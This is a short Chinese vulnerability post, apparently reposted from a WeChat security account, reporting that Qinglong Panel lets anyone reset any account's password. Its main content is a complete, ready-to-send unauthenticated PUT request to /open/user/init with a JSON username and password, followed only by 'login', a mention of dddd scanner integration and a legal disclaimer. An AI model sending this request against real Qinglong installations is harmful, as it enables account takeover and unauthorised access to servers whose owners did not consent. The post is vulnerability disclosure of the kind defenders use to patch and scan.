文章总结： 该文档披露青龙面板存在任意账号密码重置漏洞。攻击者构造PUT请求至/open/user/init接口即可重置任意用户密码并登录。复现步骤清晰展示了未授权修改凭证的过程。建议及时修复或限制接口访问，文中还提及了漏洞检测工具的集成方法以便批量排查风险。 综合评分： 72 文章分类： 漏洞POC,WEB安全,漏洞预警

青龙面板存在任意账号密码重置漏洞

安全艺术 安全艺术

安全艺术

2026年3月4日 17:01 北京

1. 漏洞复现

PUT /open/user/init HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: keep-alive
Content-Length: 49
Content-Type: application/json
Accept-Encoding: gzip, deflate, br

{"username":"test123456","password":"test123456"}

登录

2. dddd集成

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术 安全艺术 安全艺术《青龙面板存在任意账号密码重置漏洞》